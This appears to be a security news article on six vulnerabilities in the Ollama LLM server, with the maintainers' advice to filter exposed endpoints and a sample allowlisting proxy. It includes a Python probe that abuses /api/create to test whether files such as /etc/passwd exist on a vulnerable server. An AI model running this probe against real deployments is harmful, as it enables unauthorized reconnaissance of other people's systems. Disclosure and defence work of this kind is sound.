Serious flaws in the Ollama AI framework could enable DoS attacks, model theft, and model poisoning.
Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that a malicious actor could exploit to perform a variety of actions, including model theft, denial-of-service attacks, and model poisoning.
Oligo Security researcher Avi Lumelsky said in a report published last week that "collectively, the vulnerabilities could allow an attacker to carry out a wide range of malicious actions with a single HTTP request, including denial-of-service (DoS) attacks, model poisoning, model theft, and more."
Ollama is an open-source application that lets users install and run large language models (LLMs) locally on Windows, Linux, and macOS machines. Its GitHub project repository has been forked 7,600 times to date.
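To give a sense of how a local Ollama deployment is typically used, below is a minimal sketch that calls the server's documented /api/generate endpoint over its default port, 11434. The model name "llama3" is an assumption; any locally pulled model would work, and the third-party requests package is required.

```python
# Minimal sketch: query a locally running Ollama instance via its HTTP API.
# Assumes Ollama is listening on its default port (11434) and that a model
# named "llama3" has already been pulled; both are illustrative assumptions.
import requests

resp = requests.post(
    "http://127.0.0.1:11434/api/generate",
    json={"model": "llama3", "prompt": "Say hello.", "stream": False},
    timeout=60,
)
print(resp.json()["response"])
```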
The six vulnerabilities are briefly described below:
1. CVE-2024-39719 (CVSS score: 7.5) - A vulnerability that an attacker can exploit via the /api/create endpoint to determine whether a file exists on the server (fixed in version 0.1.47); a sketch of this class of probe appears after this list.
2. CVE-2024-39720 (CVSS score: 8.2) - An out-of-bounds read vulnerability that could cause the application to crash via the /api/create endpoint, resulting in a denial-of-service condition (fixed in version 0.1.46).
3. CVE-2024-39721 (CVSS score: 7.5) - A vulnerability that causes resource exhaustion and, ultimately, a denial of service when the /api/create endpoint is called repeatedly with the file "/dev/random" as input (fixed in version 0.1.34).
4. CVE-2024-39722 (CVSS score: 7.5) - A path traversal vulnerability in the api/push endpoint that exposes the files on the server and the entire directory structure on which Ollama is deployed (fixed in version 0.1.46).
5. A vulnerability that could lead to model poisoning via the /api/pull endpoint from an untrusted source (no CVE identifier, unpatched).
6. A vulnerability that could lead to model theft via the /api/push endpoint to an untrusted target (no CVE identifier, unpatched).
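As a rough illustration of the first issue, the sketch below shows how a file-existence oracle of the CVE-2024-39719 kind can work in principle: the attacker asks the server to build a model from a Modelfile referencing an arbitrary path, and infers whether the path exists from the error returned. It assumes a pre-0.1.47 Ollama instance on the default port; the request body follows Ollama's documented /api/create schema, but the error-string heuristic is an assumption for illustration, not taken verbatim from the advisory.

```python
# Hypothetical probe illustrating a CVE-2024-39719-style file-existence leak.
# Assumes a vulnerable (pre-0.1.47) Ollama server on the default port 11434.
import requests

OLLAMA = "http://127.0.0.1:11434"  # Ollama's default listen address

def file_exists_on_server(path: str) -> bool:
    # Ask Ollama to create a model whose Modelfile references `path`.
    # A vulnerable server answers differently for existing vs. missing
    # files, leaking whether the path is present on disk.
    resp = requests.post(
        f"{OLLAMA}/api/create",
        json={"name": "probe", "modelfile": f"FROM {path}"},
        timeout=10,
    )
    # Illustrative heuristic only: treat "no such file" errors as absence.
    return "no such file" not in resp.text.lower()

for candidate in ("/etc/passwd", "/etc/nonexistent"):
    print(candidate, "->", "exists" if file_exists_on_server(candidate) else "absent")
```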
For the two unpatched vulnerabilities, Ollama's maintainers recommend that users filter which endpoints are exposed to the internet by means of a proxy or a web application firewall. "Meaning that, by default, not all endpoints should be exposed," Lumelsky said. That is a risky assumption, he added: not everyone is aware of it or filters HTTP routing to Ollama, and these endpoints are currently available through Ollama's default port as part of every deployment, without any separation or documentation to back it up.
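One way to apply the maintainers' advice is to put a filtering proxy in front of Ollama so that only intentionally exposed endpoints are reachable. The sketch below shows the idea with Python's standard library; the allowlist, ports, and error handling are illustrative assumptions, and a production deployment would more likely rely on a hardened reverse proxy or web application firewall.

```python
# Sketch of the suggested mitigation: an allowlisting proxy in front of
# Ollama that rejects sensitive endpoints (/api/create, /api/pull,
# /api/push) before they reach the server. Allowlist and ports are
# illustrative assumptions, not a vetted production configuration.
from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.error
import urllib.request

OLLAMA_UPSTREAM = "http://127.0.0.1:11434"         # Ollama's default port
ALLOWED_PREFIXES = ("/api/generate", "/api/chat")  # illustrative allowlist

class FilteringProxy(BaseHTTPRequestHandler):
    def _handle(self):
        # Reject anything outside the allowlist outright.
        if not self.path.startswith(ALLOWED_PREFIXES):
            self.send_error(403, "endpoint not exposed")
            return
        # Forward the allowed request to the local Ollama instance.
        length = int(self.headers.get("Content-Length", 0) or 0)
        body = self.rfile.read(length) if length else None
        req = urllib.request.Request(
            OLLAMA_UPSTREAM + self.path,
            data=body,
            method=self.command,
            headers={"Content-Type": self.headers.get("Content-Type", "application/json")},
        )
        try:
            with urllib.request.urlopen(req) as upstream:
                self.send_response(upstream.status)
                self.send_header("Content-Type", upstream.headers.get("Content-Type", ""))
                self.end_headers()
                self.wfile.write(upstream.read())
        except urllib.error.HTTPError as err:
            # Relay upstream errors without exposing internal details.
            self.send_error(err.code)

    do_GET = do_POST = _handle

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), FilteringProxy).serve_forever()
```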